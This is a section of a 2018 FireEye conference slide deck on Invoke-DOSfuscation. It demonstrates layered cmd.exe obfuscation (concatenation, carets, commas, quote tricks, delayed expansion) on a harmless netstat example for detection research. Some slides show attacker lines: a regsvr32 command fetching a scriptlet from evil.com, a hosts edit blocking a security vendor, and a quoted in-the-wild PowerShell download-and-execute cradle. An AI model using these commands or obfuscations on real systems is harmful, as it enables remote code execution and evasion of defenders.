  77. 77. • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • For obfuscating final cmdline arguments: • User-input command (e.g. netstat -ano) must be obfuscated manually (, ; ^ "" etc.) • Invoke-DOSfuscation handles all layers of escaping for input obfuscation characters 77 INSANELY complicated in certain scenarios, especially since there is no tokenizer for cmd.exe like there is for PowerShell. Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  78. 78. • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • For obfuscating final cmdline arguments: • User-input command (e.g. netstat -ano) must be obfuscated manually (, ; ^ "" etc.) • Invoke-DOSfuscation handles all layers of escaping for input obfuscation characters 78 INSANELY complicated in certain scenarios, especially since there is no tokenizer for cmd.exe like there is for PowerShell. http://www.reactiongifs.com/r/small-violin.gif Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  79. 79. • What cmd.exe commands do attackers use that do NOT create child processes? 79 Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  80. 80. • What cmd.exe commands do attackers use that do NOT create child processes? • File copy: cmd /c copy powershell.exe benign.exe • File deletion: cmd /c del benign.exe • File creation: cmd /c "echo LINE1 > bad.vbs&&echo LINE2 >> bad.vbs" • File read: cmd /c type HOSTS • File modification: cmd /c "echo 127.0.0.1 cloud.security-vendor.com >> HOSTS" • File listing: cmd /c dir "C:Program Files*" • Dir creation: cmd /c mkdir %PUBLIC%Recon • Symbolic link creation: cmd /c mklink ClickMe C:UsersPublicevil.exe 80 Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  81. 81. • Perhaps your target is monitoring for carets, commas, semicolons, etc. • What additional obfuscation options does cmd.exe give us? 1. 2. 3. 4. 81 Deep(er) Dive: Advanced Payload Obfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  82. 82. • cmd /c netstat -ano 82 Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  83. 83. • cmd /c netstat -ano 83 – and / interchangeability Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  84. 84. • cmd /c netstat /ano 84 – and / interchangeability Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  85. 85. • cmd /c netstat /ano 85 – and / interchangeability • More examples: • wscript.exe /nologo … • powershell.exe -nop -noni -enc … • regsvr32.exe /s /n /u /i:https://evil.com/a scrobj.dll Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  86. 86. • cmd /c netstat /ano 86 – and / interchangeability • More examples: • wscript.exe -nologo … • powershell.exe -nop -noni -enc … • regsvr32.exe /s /n /u /i:https://evil.com/a scrobj.dll Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  87. 87. • cmd /c netstat /ano 87 – and / interchangeability • More examples: • wscript.exe -nologo … • powershell.exe /nop /noni /enc … • regsvr32.exe /s /n /u /i:https://evil.com/a scrobj.dll Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  88. 88. • cmd /c netstat /ano 88 – and / interchangeability • More examples: • wscript.exe -nologo … • powershell.exe /nop /noni /enc … • regsvr32.exe -s -n -u -i:https://evil.com/a scrobj.dll Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  89. 89. • cmd /c netstat /ano 89 – and / interchangeability • More examples: • wscript.exe -nologo … • powershell.exe /nop /noni /enc … • regsvr32.exe -s -n -u -i:https://evil.com/a scrobj.dll Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  90. 90. • cmd /c netstat /ano 90 – and / interchangeability • More examples: • wscript.exe -nologo … • powershell.exe /nop /noni /enc … • regsvr32.exe -s -n -u -i:https:evil.coma scrobj.dll Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  91. 91. • cmd /c netstat /ano 91 – and / interchangeability • More examples: • wscript.exe -nologo … • powershell.exe /nop /noni /enc … • regsvr32.exe -s -n -u -i:https:evil.coma scrobj.dll https://i.imgur.com/8oXBdLG.gif Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  92. 92. • cmd /c "set com=netstat /ano&&echo %com%" 92 Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  93. 93. • cmd /c "set com=netstat /ano&&echo %com%" 93 Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  94. 94. • cmd /c "set com=netstat /ano&&call %com%" 94 Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  95. 95. • cmd /c "set com=netstat /ano&&call %com%" 95 Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  96. 96. • cmd /c "set com1=net&&set com2=stat&&set com3= /ano&&call %com1%%com2%%com3%" 96 Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  97. 97. • cmd /c "set com1=net&&set com2=stat&&set com3= /ano&&call %com1%%com2%%com3%" 97 #TestYourTools: • Sysmon EID 1 CommandLine adds duplicate %'s • EventVwr.exe • PowerShell's Get-WinEvent Payload Obfuscation 1 of 4: Concatenation http://www.danielbohannon.com/blog-1/2018/3/19/test-your-dfir-tools-sysmon-edition DETOUR COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  98. 98. • cmd /c "set com1=net&&set com2=stat&&set com3= /ano&&call %com1%%com2%%com3%" 98 • Reorder substrings • Set into single final env var Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  99. 99. • cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call %com1%%com2%%com3%" 99 • Reorder substrings • Set into single final env var Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  100. 100. • cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set final=%com1%%com2%%com3%&&call %final%" 100 • Reorder substrings • Set into single final env var Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  101. 101. • cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set final=%com1%%com2%%com3%&&call %final%" 101 1. 2. 3. 4. 5. 1. 2. 3. 4. 5. Invoke-DOSfuscation argumentsFinal syntax Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  102. 102. • cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set final=%com1%%com2%%com3%&&call %final%" 102 1. call %final% 2. 3. 4. 5. 1. (default when possible) 2. 3. 4. 5. Invoke-DOSfuscation argumentsFinal syntax Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  103. 103. • cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set final=%com1%%com2%%com3%&&call %final%" 103 1. call %final% 2. cmd /c %final% 3. 4. 5. 1. (default when possible) 2. -FinalBinary cmd 3. 4. 5. Invoke-DOSfuscation argumentsFinal syntax Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  104. 104. • cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set final=%com1%%com2%%com3%&&call %final%" 104 1. call %final% 2. cmd /c %final% 3. call echo %final% | cmd 4. 5. 1. (default when possible) 2. -FinalBinary cmd 3. -FinalBinary cmd -StdIn 4. 5. Invoke-DOSfuscation argumentsFinal syntax Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  105. 105. • cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set final=%com1%%com2%%com3%&&call %final%" 105 1. call %final% 2. cmd /c %final% 3. call echo %final% | cmd 4. call powershell "%final%" 5. 1. (default when possible) 2. -FinalBinary cmd 3. -FinalBinary cmd -StdIn 4. -FinalBinary PowerShell 5. Invoke-DOSfuscation argumentsFinal syntax Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  106. 106. • cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set final=%com1%%com2%%com3%&&call %final%" 106 1. call %final% 2. cmd /c %final% 3. call echo %final% | cmd 4. call powershell "%final%" 5. call echo %final% | powershell - 1. (default when possible) 2. -FinalBinary cmd 3. -FinalBinary cmd -StdIn 4. -FinalBinary PowerShell 5. -FinalBinary PowerShell -StdIn Invoke-DOSfuscation argumentsFinal syntax Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  107. 107. • cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set final=%com1%%com2%%com3%&&call %final%" 107 Invoke-DOSfuscation functions also wrap all the building block techniques into each input command… Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  108. 108. • CMd /C "sEt coM3= /ano&&SEt cOm2=stat&&seT CoM1=net&&caLl SeT fiNAl=%COm1%%cOm2%%coM3%&&cAlL %FinAl%" 108 Invoke-DOSfuscation functions also wrap all the building block techniques into each input command… • Random case • • • • Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  109. 109. • CMd/C"sEt coM3= /ano&&SEt cOm2=stat&&seT CoM1=net&&caLl SeT fiNAl=%COm1%%cOm2%%coM3%&&cAlL %FinAl%" 109 Invoke-DOSfuscation functions also wrap all the building block techniques into each input command… • Random case • Whitespace (-/+) • • • Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  110. 110. • CMd /C " sEt coM3= /ano&& SEt cOm2=stat&& seT CoM1=net&& caLl SeT fiNAl=%COm1%%cOm2%%coM3%&& cAlL %FinAl% " 110 Invoke-DOSfuscation functions also wrap all the building block techniques into each input command… • Random case • Whitespace (-/+) • • • Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  111. 111. • ;,,CMd,; ,/C ", ;, ;sEt coM3= /ano&&,,,SEt cOm2=stat&&;;;seT CoM1=net&&, ;caLl,;,SeT fiNAl=%COm1%%cOm2%%coM3%&&; , ,cAlL, ;, ;%FinAl% " 111 Invoke-DOSfuscation functions also wrap all the building block techniques into each input command… • Random case • Whitespace (-/+) • Comma & semicolon • • Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  112. 112. • ;,,C^Md^,; ,^/^C^ ^ ", ;, ;s^Et ^ ^ co^M3=^^ /^^an^o&&,,,S^Et^ ^ ^cO^m2=^s^^ta^^t&&;;;s^eT^ ^ C^oM1^=^n^^et&&, ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%&&; , ,c^AlL^, ;,^ ;%Fi^nAl^% " 112 Invoke-DOSfuscation functions also wrap all the building block techniques into each input command… • Random case • Whitespace (-/+) • Comma & semicolon • Caret • Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  113. 113. • ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^et) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) " 113 Invoke-DOSfuscation functions also wrap all the building block techniques into each input command… • Random case • Whitespace (-/+) • Comma & semicolon • Caret • Parentheses Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  114. 114. • ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^et) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) " 114 CMd ,; ,/C ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^et) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%%COm1^%%%%c^Om2%%^%%c^oM3^%%))&&; (, ,(c^AlL^, ;,^ ;%%Fi^nAl^%%) ) " netstat /ano Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  115. 115. • ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^e""t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) " 115 CMd ,; ,/C ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^e""t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%%COm1^%%%%c^Om2%%^%%c^oM3^%%))&&; (, ,(c^AlL^, ;,^ ;%%Fi^nAl^%%) ) " ne""tstat /ano Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  116. 116. • ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^e""t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) " 116 ne""tstat /ano vs n"e"tstat /ano Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  117. 117. • ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n"^^e"t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) " 117 ne""tstat /ano vs n"e"tstat /ano Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  118. 118. • ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n"^^e"t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) " 118 ne""tstat /ano vs n"e"tstat /ano ✘ If we have to pair double quotes, how can we unpair in final variable? Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  119. 119. • ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n"^^e"t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) " 119 ne""tstat /ano vs n"e"tstat /ano • Steps for unpaired quotes 1. 2. 3. 4. Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  120. 120. • ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) " 120 ne""tstat /ano vs n"e"tstat /ano • Steps for unpaired quotes 1. Double up quotes 2. 3. 4. Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  121. 121. • ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) " 121 ne""tstat /ano vs n"e"tstat /ano • Steps for unpaired quotes 1. Double up quotes 2. Set quotes in env var 3. 4. Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  122. 122. • ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^ %) ) " 122 ne""tstat /ano vs n"e"tstat /ano • Steps for unpaired quotes 1. Double up quotes 2. Set quotes in env var 3. Char substitution 4. Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  123. 123. • ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^:""= %) ) " 123 ne""tstat /ano vs n"e"tstat /ano • Steps for unpaired quotes 1. Double up quotes 2. Set quotes in env var 3. Char substitution 4. Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  124. 124. • ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^:""=%quotes:~0,1%%) ) " 124 ne""tstat /ano vs n"e"tstat /ano • Steps for unpaired quotes 1. Double up quotes 2. Set quotes in env var 3. Char substitution 4. Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  125. 125. • ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^:""=%quotes:~0,1%%) ) " 125 ne""tstat /ano vs n"e"tstat /ano • Steps for unpaired quotes 1. Double up quotes 2. Set quotes in env var 3. Char substitution 4. ✘ ✘ Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  126. 126. https://i.imgur.com/PD9klNV.jpg • ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^:""=%quotes:~0,1%%) ) " 126 ne""tstat /ano vs n"e"tstat /ano • Steps for unpaired quotes 1. Double up quotes 2. Set quotes in env var 3. Char substitution 4. ??? Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  127. 127. https://i.imgur.com/PD9klNV.jpg • ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^:""=!quotes:~0,1!%) ) " 127 ne""tstat /ano vs n"e"tstat /ano • Steps for unpaired quotes 1. Double up quotes 2. Set quotes in env var 3. Char substitution 4. ??? Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  128. 128. • ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^:""=!quotes:~0,1!%) ) " 128 • Steps for unpaired quotes 1. Double up quotes 2. Set quotes in env var 3. Char substitution 4. ??? Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  129. 129. • ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^:""=!quotes:~0,1!%) ) " 129 • Steps for unpaired quotes 1. Double up quotes 2. Set quotes in env var 3. Char substitution 4. ??? Payload Obfuscation 1 of 4: Concatenation https://pbs.twimg.com/media/DHCh2GvWAAUevcd.jpg:large COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  130. 130. • ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^:""=!quotes:~0,1!%) ) " 130 • Steps for unpaired quotes 1. Double up quotes 2. Set quotes in env var 3. Char substitution 4. Variable expansion • /V:ON • /V:O • /V: • /V Payload Obfuscation 1 of 4: Concatenation https://pbs.twimg.com/media/DHCh2GvWAAUevcd.jpg:large COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  131. 131. • ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^:""=!quotes:~0,1!%) ) " 131 • Steps for unpaired quotes 1. Double up quotes 2. Set quotes in env var 3. Char substitution 4. Variable expansion • /V:ON • /V:O • /V: • /V • /VISTA • /VM • /V* Payload Obfuscation 1 of 4: Concatenation https://pbs.twimg.com/media/DHCh2GvWAAUevcd.jpg:large COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  132. 132. • ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^:""=!quotes:~0,1!%) ) " 132 • Env var names can be: 1. 2. Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  133. 133. • ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ --$#$--=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^!!#**#!!=^s^^ta^^t)&&(;(;;s^eT^ ^ ……...=^n""^^e""t) ) &&set ;;;;;;;;;=""&&, (( ;c^aLl,^;,S^e^T ^ ^ '''''''''''''''=^%……...%%!!#**#!!%^%--$#$--%))&&; (, ,(c^AlL^, ;,^ ;%''''''''''''''':""=!;;;;;;;;;:~0,1!%) ) " 133 • Env var names can be: 1. Special characters 2. Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  134. 134. • ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ ' =^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^' =^s^^ta^^t)&&(;(;;s^eT^ ^ ' =^n""^^e""t) ) &&set ' =""&&, (( ;c^aLl,^;,S^e^T ^ ^ ' =^%' %%' %^%' %))&&; (, ,(c^AlL^, ;,^ ;%' :""=!' :~0,1!%) ) " 134 • Env var names can be: 1. Special characters 2. Whitespace Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  135. 135. 135 https://i.imgflip.com/rjkyg.jpg Payload Obfuscation 1 of 4: Concatenation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  136. 136. • Concatenation examples in the wild (1/3): 136 ........WindowsSystem32cmd.exe /c "set da=wersh&& set gg=ell&& set c0=po&&" cmd /c %c0%%da%%gg% -nonI -eP bypass -c iEx ((n`eW-OBjECt ('n'+'Et.w'+'EbclIe'+'nT')).('do'+'wNlo'+'adst'+'ring').Invoke(('h'+$s4+'t'+'t'+$o8 +'ps://'+… Invoke-Obfuscation payload Payload Obfuscation 1 of 4: Concatenation (ITW 1/3) COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
